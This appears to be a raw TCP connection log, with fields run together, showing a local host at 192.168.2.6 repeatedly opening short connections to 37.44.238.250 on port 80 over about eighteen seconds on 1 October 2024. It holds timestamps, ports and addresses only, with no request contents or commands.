                                                          Oct 1, 2024 05:58:32.618829012 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.619560003 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.624102116 CEST804978237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.624164104 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.624346018 CEST804978337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.624463081 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.624578953 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.629302979 CEST804978337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.980937004 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.986026049 CEST804978337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:33.259522915 CEST804978337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:33.309017897 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.395345926 CEST804978337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:33.449567080 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.507903099 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.508558035 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.513066053 CEST804978337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:33.513382912 CEST804978437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:33.513457060 CEST4978380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.513483047 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.513641119 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.518464088 CEST804978437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:33.871493101 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:33.876553059 CEST804978437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:34.148068905 CEST804978437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:34.199537992 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.283062935 CEST804978437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:34.324534893 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.415194035 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.415515900 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.420432091 CEST804978437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:34.420500040 CEST804978537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:34.420504093 CEST4978480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.420577049 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.421612978 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.426409960 CEST804978537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:34.777877092 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:34.782855034 CEST804978537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.026133060 CEST804978537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.074534893 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.153289080 CEST804978537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.199721098 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.273246050 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.273988962 CEST4978680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.278434992 CEST804978537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.278526068 CEST4978580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.278786898 CEST804978637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.278873920 CEST4978680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.278979063 CEST4978680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.283775091 CEST804978637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.503324032 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.503446102 CEST4978680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.508184910 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.508284092 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.508404016 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.513140917 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.550368071 CEST804978637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.645013094 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.649868011 CEST804978837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.649921894 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.650032043 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.654762983 CEST804978837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.730129004 CEST804978637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.730185032 CEST4978680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.857446909 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:35.862335920 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.862377882 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:35.996474981 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.001821995 CEST804978837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.119774103 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.168262959 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.253523111 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.275450945 CEST804978837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.293266058 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.324518919 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.408927917 CEST804978837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.449515104 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.539263964 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.539351940 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.540102005 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.544748068 CEST804978737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.544769049 CEST804978837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.544811964 CEST4978780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.544845104 CEST4978880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.544926882 CEST804978937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.545311928 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.545548916 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.550292015 CEST804978937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:36.906353951 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:36.911295891 CEST804978937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:37.158543110 CEST804978937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:37.199527025 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.285557032 CEST804978937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:37.340154886 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.420150042 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.420674086 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.425343990 CEST804978937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:37.425463915 CEST804979037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:37.425518036 CEST4978980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.425555944 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.425664902 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.430413008 CEST804979037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:37.777894020 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:37.782785892 CEST804979037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.052000046 CEST804979037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.105882883 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.232135057 CEST804979037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.277740955 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.354043961 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.354717016 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.359267950 CEST804979037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.359527111 CEST804979137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.359586954 CEST4979080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.359620094 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.359731913 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.364439011 CEST804979137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.715250015 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:38.720453024 CEST804979137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:38.966089964 CEST804979137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.012180090 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.107497931 CEST804979137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.152678967 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.226917028 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.227469921 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.232067108 CEST804979137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.232153893 CEST4979180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.232399940 CEST804979237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.232472897 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.232589960 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.237401962 CEST804979237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.590984106 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.596066952 CEST804979237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.847886086 CEST804979237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:39.902707100 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:39.987871885 CEST804979237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.043303013 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.101641893 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.102320910 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.106976986 CEST804979237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.107062101 CEST4979280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.107424021 CEST804979337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.107502937 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.107616901 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.112435102 CEST804979337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.465281010 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.470288992 CEST804979337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.735183001 CEST804979337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.777652979 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.871229887 CEST804979337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.918329000 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.992330074 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.992831945 CEST4979480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.999749899 CEST804979337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.999804974 CEST4979380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:40.999874115 CEST804979437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:40.999927998 CEST4979480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.000024080 CEST4979480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.006637096 CEST804979437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.262676954 CEST4979480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.263356924 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.268353939 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.268445969 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.268526077 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.273319960 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.310411930 CEST804979437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.383259058 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.388268948 CEST804979637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.388335943 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.388561010 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.393327951 CEST804979637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.484713078 CEST804979437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.484961987 CEST4979480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.621535063 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.626418114 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.626560926 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.747777939 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:41.752808094 CEST804979637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.914860010 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:41.965161085 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.016226053 CEST804979637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.045919895 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.058916092 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.090152025 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.147058964 CEST804979637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.199517012 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.288592100 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.288594961 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.289345026 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.294418097 CEST804979637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.294493914 CEST4979680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.294553995 CEST804979737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.294565916 CEST804979537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.294631004 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.294634104 CEST4979580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.294735909 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.299943924 CEST804979737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.652846098 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:42.657915115 CEST804979737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.901942015 CEST804979737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:42.949569941 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.030452967 CEST804979737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:43.074537992 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.149291992 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.155205965 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:43.155390978 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.155525923 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.160243034 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:43.512151003 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.517098904 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:43.761688948 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:43.808892965 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:43.893146992 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:43.935214996 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.006951094 CEST4979780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.011185884 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.011796951 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.016630888 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.016645908 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.016688108 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.016725063 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.016827106 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.021637917 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.372549057 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.377648115 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.633979082 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.683901072 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.764720917 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.808908939 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.893404007 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.896357059 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.900799036 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.900851011 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.903544903 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.903613091 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.903740883 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.910855055 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.262123108 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.267143011 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.510457039 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.558918953 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.638916016 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.683916092 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.757519007 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.758104086 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.762607098 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.762789965 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.762881041 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.766746044 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.766976118 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.771754980 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.121481895 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.126405954 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.369663000 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.418386936 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.500583887 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.543282032 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.621563911 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.622227907 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.626708031 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.627063036 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.627237082 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.627271891 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.627408028 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.632133007 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.980992079 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.985961914 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.081346989 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.081600904 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.086474895 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.086733103 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.086757898 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.086813927 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.086890936 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.091619968 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.339649916 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.344609022 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.344691038 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.344788074 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.349666119 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.434097052 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.439011097 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.439106941 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.699661970 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.705801964 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.727000952 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.777780056 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.859420061 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.902766943 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.971018076 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.012068987 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.105403900 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.152817011 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.225306034 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.225982904 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.225982904 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230684996 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.230767012 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230828047 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.230890036 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230926991 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.230947971 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230976105 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.235726118 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.590233088 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.595268011 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.836812019 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.887084007 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.965194941 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.012048960 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.086014032 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.090838909 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.090905905 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.091048002 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.095801115 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.449748039 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.454760075 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.697241068 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.746731997 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.829682112 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.873305082 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.946461916 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.947110891 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.951714993 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.951872110 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.951926947 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.951992989 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.952128887 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.956830025 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.309144020 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.314189911 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.587229967 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.637070894 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.724678040 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.777731895 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.850223064 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.855619907 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.856271029 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.860774994 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.860857010 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.861083984 CEST804980837.44.238.250192.168.2.6
